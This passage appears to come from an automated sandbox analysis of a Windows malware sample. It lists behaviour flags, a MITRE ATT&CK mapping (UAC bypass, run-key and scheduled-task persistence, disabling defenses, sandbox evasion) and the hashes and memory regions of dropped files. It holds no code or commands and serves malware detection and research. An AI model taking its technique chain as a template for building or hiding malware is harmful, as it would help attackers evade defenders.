    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:2460

Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Event Triggered Execution

        1
        T1546

        Installer Packages

        1
        T1546.016

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Abuse Elevation Control Mechanism

        1
        T1548

        Bypass User Account Control

        1
        T1548.002

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Event Triggered Execution

        1
        T1546

        Installer Packages

        1
        T1546.016

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Abuse Elevation Control Mechanism

        1
        T1548

        Bypass User Account Control

        1
        T1548.002

        Hide Artifacts

        1
        T1564

        Ignore Process Interrupts

        1
        T1564.011

        Impair Defenses

        1
        T1562

        Disable or Modify Tools

        1
        T1562.001

        Indicator Removal

        1
        T1070

        File Deletion

        1
        T1070.004

        Modify Registry

        3
        T1112

        System Binary Proxy Execution

        1
        T1218

        Msiexec

        1
        T1218.007

        Virtualization/Sandbox Evasion

        2
        T1497

        Credential Access

        Discovery

        Peripheral Device Discovery

        1
        T1120

        Query Registry

        5
        T1012

        System Information Discovery

        5
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        Virtualization/Sandbox Evasion

        2
        T1497

        Lateral Movement

        Remote Services

        1
        T1021

        Remote Desktop Protocol

        1
        T1021.001

        Collection

        Command and Control

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Config.Msi\f789031.rbs
          Filesize

          8KB

          MD5

          950fbdcb1cef81dbca30b560bf24bff4

          SHA1

          95c80c162858a43d984b1e09f0eb5c817a98a562

          SHA256

          f3ae3bda19c0246aa00cff4d6b9044676a095309122626803978a0798eacfd2e

          SHA512

          19f0083d5b4a2d6fed6624e341abd2a39d7aeafa6826765b2068a253806cd0d6291d524957164dede8a4f5178a1dbdeea9e9715208f856f71c52ff000fb30187

          Download Submit

        • C:\ProgramData\Data\rar.ini
          Filesize

          10B

          MD5

          51c11db1054dd4650a33bf481ec27060

          SHA1

          17686b75163d8753be27e407aad97a76f311fc7b

          SHA256

          fc835086345b170ac995c35f24546e1b7268e3d3524a125a9396a4ec8b7d3f35

          SHA512

          94d5c2a0cb03b38657bab246a695c6528fc5f7d3ddbe716641dd59ec83a67d6ab28c083000026d10114e7ab8f8225f7c90c9fce25ef0611f46aa3899d096d80f

          Download Submit

        • C:\ProgramData\Data\un.exe
          Filesize

          601KB

          MD5

          4fdc31997eb40979967fc04d9a9960f3

          SHA1

          7f13bd62c13324681913304644489bb6b66f584a

          SHA256

          e9ea78fab020718cb75a116993bfa2a5fe71c163a801995adb9e5abebc7990a2

          SHA512

          15146e24afcfea221616ca1f049d96e8a5f9b1eccefd3a27df150e4699993889fc1ab4952f2ba1ab519b1056baaeeb4490894bc795d0cb4630f663fa08316b9a

          Download Submit

        • C:\ProgramData\Data\upx.rar
          Filesize

          1.6MB

          MD5

          e4a56c99aa4dd15cf1c65fff7ba44f01

          SHA1

          533deccda72e47da9219cf34a5569aac05d7fba8

          SHA256

          1b54aeacf41cc2f93dcb78ebfea322058e76b1b7473cf3369ef6e5be190a9a31

          SHA512

          b4ea868fb956f254f34d1ce541d9475566b5f584bba702be0045fc4c76645767f8f8230a17550a5ada3d836d7ff05f680429c9a98945982a84d301eb26626b13

          Download Submit

        • C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
          Filesize

          3KB

          MD5

          69c282fdcd177c1ac4d6709ef841da65

          SHA1

          575cbac132f5215c9446e6b440ca44a2082f0644

          SHA256

          943f169c31c319417e61586d8911057321de04926e01e4cc3e6f57b3b032c28e

          SHA512

          6b686a5d6aabe4681c6e1c83d4f32bd55d9fa26fc25ed72ecd20676c6dd3bd49cee4f1e5d1b25f2d3a90a994be00bf3b1366075272d4c3ea16917806dbbe0ea7

          Download Submit

        • C:\ProgramData\Microsoft\Program\ziliao.jpg
          Filesize

          225KB

          MD5

          aa34b76b081bf4669f7b778973628d38

          SHA1

          f9f975ed59deb67a9024020ed8a65ca146cdbf21

          SHA256

          55b687c7b659314254942d0545d3ceb0a1aaaa44eb6d1bf3412423e2637d828a

          SHA512

          159c50c4e60b487dd64c8e982d386383a2f0e5b9aee2a213b78e143e09ee657247f4ad49bf2a30ec0f6d8d8de3cb20d12dce0944baf3e6ce33e8f94f0ca13a57

          Download Submit

        • C:\ProgramData\Program\iusb3mon.exe
          Filesize

          2.7MB

          MD5

          8f18e2aa757214f05236d018b4bf11d7

          SHA1

          35a441218070c7ba05f6cad1ac7494f10a498df7

          SHA256

          988b6080aa7ce8c74cc5cf6910a08a310802b688e3cf9e8da75b48e29542d229

          SHA512

          13add8ba69ee6bda18a965720c541073ba39f236bd4def095247eecdb3795c2f2203f133705d205a18c5f7a92d7921c8c9a0741c7e6eaae832cc716f30772d6c

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log
          Filesize

          962B

          MD5

          ff1d3e5e468b20ca2b6985ad64143f15

          SHA1

          79a0c88afc8219618afa76bb61447d9676ec07a0

          SHA256

          e8b856f91b2f199b0ea832757fbb5302280684eca48f2690d97a825b7cca5e47

          SHA512

          eb309aecb5a68c09f6f69869556b7a2a640cbddabe884eddea1531c4257a7f5558c88c87e69c81d27e06d53151900f1beb429c0d9fd2b75ce5f8f595445d8e54

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log
          Filesize

          2KB

          MD5

          84d68259f9ef9eed8a0506d0e3ee64c5

          SHA1

          3f794f6c237fd19b2a89bd3356d94f92f47d4e0c

          SHA256

          1c0c719476ce20f1c0e18654df032fac81baf82d62c5e314e15f9e5ff26a0f20

          SHA512

          b1aaa468ea0297e8d4ced88765e4c064db7986880537cd8f90b85872720234b78f7e1fb853460e5fd10175fc60570c2885b4a4e5143fd790e1a9d651f1bbac51

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log
          Filesize

          1KB

          MD5

          1ceb5165f1e435a8132c403c6542ae95

          SHA1

          cd650376bce0babd4b07b31ad595da00c8d2ed1a

          SHA256

          e5bb3bd3f3b81693d0727993a631950aee7f100f23d5090ec20e320bb0813dbf

          SHA512

          b01b4ef1dba12736e5155a3111e23b74bfaba900239b116d3d5e9a190cb7775a8d42049b1db91d069845e585ec8004fc415bdd061b8efd73dd719f4f8a3b9953

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log
          Filesize

          2KB

          MD5

          c6f29cf6f15bc123d0ac663038ccf886

          SHA1

          ad32e0b495d9d8e55265a3d5b0d6aad1f2123563

          SHA256

          467ef56719b3c527d861fb7874b121c8042500e86a15e04bbcef9b20834b6884

          SHA512

          c455195328246088393590197a08b19e530823510fe76247c786b96eb1ca32160969527b4eef571acef01b54d6406b04fe0cfb5a98b32290fe9fdd5c67ff23cc

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log
          Filesize

          1KB

          MD5

          33d0101ababc65b21471fcc6cd14cd4e

          SHA1

          19b1b539e93abd293d1a0a90eab86c43313bacf0

          SHA256

          f98d51f1354d9e7f01a36074b2fc22df1139ea173cfa9cb7e4f24b0b2bc5d54f

          SHA512

          f509cd0248f19c50c9aab1c72c4e9d0c8f406800878e8e7ee1892265212f8a2461888b40a017c8229ff055b53b6c002ee80b4785aa917ced1c6a471b133fd9e4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log
          Filesize

          2KB

          MD5

          5a18280aed20e8cc704c6211597e4195

          SHA1

          4286c3091e9bd83e03f1dd3b498b26b5cfb3741d

          SHA256

          4ef2d1e0d41531cbf24b559261586d4abb7f3aaa8637bd895f630ed3b1d3ba45

          SHA512

          49051747339cd89a2d3892f8b133ef60ff696681cdeaa257039763c37c8d606904c6b2ca3c623adf1a2d7002f5f44f1418fea017d9fc42ef688d3d2b2230dd85

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\nszD329.tmp\InstWelcome.ini
          Filesize

          1KB

          MD5

          2c3b2f67fc147b4e5d58c47805f8dd82

          SHA1

          5a6b004dd1e7b4b2daef0245157f368a61c69075

          SHA256

          ea0d2e42a991f89cd284f18e05c3d96132c5ae6138561491751c709ba9f1faff

          SHA512

          d50a7b563f2c458b3262d086142d89ed1c055fc2cf7768cd3442b2085b5cd5bc6714eda769798cc72c231589ee7904716d6596be43a20f720f549da0c9a08531

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          b52662b1861e64532837a7a22a72bc58

          SHA1

          808482da1012e7797c0c38d92e57f14212c4398c

          SHA256

          e7219577152d5dc67c17c83df5edf03ea3a73bc69c0c66c0e375e31de4b7a144

          SHA512

          0db65321267939b7479d3f1ba45d376e99f5dc238abcd71256e8c4ebe78746639bc0cc7436b217bb7519a4c529588829f24e912ee2c192b9df5d368b08ab62ef

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          c20697106a6c43eaf693921c24b5e3d4

          SHA1

          ca972d02c30515fb280f931a6216403a45e8312e

          SHA256

          2cb66dd5697446aa7656ef0e59458d9c46fc44882095696880aeafed5608f608

          SHA512

          a91541757aa8f63686d6b981dd48db4e6680cb391a545c50e97d1f760973a223700650bad8bf96a21e7f6ec3e77a8ef1d78ce8b11c15c50e113adba49fc63946

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
          Filesize

          7KB

          MD5

          61f5b335414b85e0ec69d1cd7c2a9827

          SHA1

          9fa3706e92667f8913f80e97f02000ef4b6887e2

          SHA256

          0b0d2be9c02cdf260387a7bffd8ff1aa1c37369089f88f0521ae935d8955adec

          SHA512

          edc04d45a1e659012426584869dbf0e8a62fa930f63ad23635d4a8b49aa02c9da6050bbdcb4b1f6f769325217d9856c3b23b70bdb95f976ea1b265eec205197f

          Download Submit

        • C:\Windows\Installer\MSI91E3.tmp
          Filesize

          990KB

          MD5

          b9ff2dd6924711531e59e90581cda548

          SHA1

          6c8d572587c40a1fd8c20bd4f1929bb0fbb12009

          SHA256

          ad564d4d64bb74ea6819e081534131f6f78e3c019d37abbc3eef8e09dfed96d7

          SHA512

          d026c8128c1a182aa7f9d7cba179b411ad679e3bf89723a3498ab493cb6938579ee703ade35595f6b5178413e0df7f6f9a152a5036759e42f1d6f52cc0a61227

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nszD329.tmp\InstallOptions.dll
          Filesize

          15KB

          MD5

          aaa17e959957fb648c7b79ff7d1c5b83

          SHA1

          aefc13b7926892bf952ed7fec77b73d98b27bd91

          SHA256

          dbd62ba3c05d89511396c68c40a25f8ceabc5976fdadd11b704d2ecbc6c5b96f

          SHA512

          b05625196ff2dca7428cf6e66e492814f6e3144e963505cf4401b1dd4e6b3467100425aa0527c4f6068e13c7a9b72c88c11a87bc80d89bf3fd4183e5bd8fbab9

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nszD329.tmp\LangDLL.dll
          Filesize

          5KB

          MD5

          65e28969588b8ee8f867db3d16c92f00

          SHA1

          8c183d9c159229b4cbd4778b44677444320a5e8d

          SHA256

          8eb83a1a5c184ec061fb48acc18beac9d621f7476ac75d3e917901bc9f70e79a

          SHA512

          203724506b97b93c42ca286bad49f81c3e2c4c3dbf17bcaaecda82a2cc2a17b6e3daf87de1d0bef6c03a4c6dac2703ca77335c871eff3eaa074c9c48d80d636a

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nszD329.tmp\System.dll
          Filesize

          11KB

          MD5

          d77839cc52a47e2db7d7fb944643fb0a

          SHA1

          ed3cd493e5a465a143862df3f280e936f3bd2fac

          SHA256

          93b73294a24201a4299fd0da7e0ab0dbffa130da300cc3a2c80d2aa7f2da7c77

          SHA512

          76f2739990bfae391f8c4c7346487150fa70eca82a15adff14e84d83ca03af5b202b8abab139f56b59dffd942a26aacdb359548367be7f80ff6bbf28b973e77e

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nszD329.tmp\UserInfo.dll
          Filesize

          4KB

          MD5

          6461ba2b54c2239503eff55de913c437

          SHA1

          7796499cc23eee4c522be381987913e6c5e8826e

          SHA256

          4658e40d14895f792cb5ea8bbee7dc95a6bff6478f8e41c3732a66b92fccc0d5

          SHA512

          12ae466bc824d57d8e44b5a2dca395b98f002fe3cfe4ed544939d7ce5480b174934adf4e9e06ea9d6907e64e180f1b1b6f9d25d607713ca23bb090f1cf3379cf

          Download Submit

        • \Users\Admin\AppData\Local\Temp\nszD329.tmp\killProc.dll
          Filesize

          89KB

          MD5

          b9edf77857f539db509c59673523150a

          SHA1

          23276a59846d61d0a1826ba3b3f3c4b47b257f20

          SHA256

          62f8e07d3ba5e9e57aaf529786a92931098f6ee33c6ab5057be5ad4ee0545b31

          SHA512

          8bedf1ffd4d5f1853e1794e32b7ff482c3c207a8d6600a54d9f0c583feac8711ac70c985f4579a947ee3c686e179dcdf42752bb45da2a5b9254f372265a92f79

          Download Submit

        • memory/960-133-0x0000000004360000-0x00000000043A0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/960-353-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-372-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-371-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-75-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-317-0x0000000004360000-0x00000000043A0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/960-107-0x0000000004360000-0x00000000043A0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/960-113-0x0000000004360000-0x00000000043A0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/960-370-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-369-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-364-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-365-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-366-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-367-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/960-368-0x0000000000400000-0x00000000006BF000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/2524-68-0x00000000037B0000-0x0000000003A6F000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/2524-336-0x00000000037B0000-0x0000000003A6F000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/2524-70-0x00000000037B0000-0x0000000003A6F000-memory.dmp

          Filesize

          2.7MB

          Download

        • memory/2524-69-0x00000000037B0000-0x0000000003A6F000-memory.dmp

          Filesize

          2.7MB

          Download